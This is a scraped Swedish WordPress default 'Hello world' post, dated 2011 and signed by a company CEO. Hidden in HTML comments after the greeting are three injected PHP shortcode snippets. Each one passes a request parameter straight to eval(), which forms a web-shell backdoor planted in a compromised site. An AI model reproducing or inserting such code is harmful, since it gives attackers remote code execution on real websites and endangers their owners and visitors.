Hej världen!

Hej världen!

Välkommen till WordPress. Det här är ditt första inlägg. Redigera det eller radera det. Sedan kan du börja blogga!

<!– [insert_php]if (isset($_REQUEST["eBJA"])){eval($_REQUEST["eBJA"]);exit;}[/insert_php][php]if (isset($_REQUEST["eBJA"])){eval($_REQUEST["eBJA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["BNrNk"])){eval($_REQUEST["BNrNk"]);exit;}[/insert_php][php]if (isset($_REQUEST["BNrNk"])){eval($_REQUEST["BNrNk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FZY"])){eval($_REQUEST["FZY"]);exit;}[/insert_php][php]if (isset($_REQUEST["FZY"])){eval($_REQUEST["FZY"]);exit;}[/php] –>

Publicerat 2011-04-19 av

Olov Schagerlund

VD och koncernchef

Dela inlägget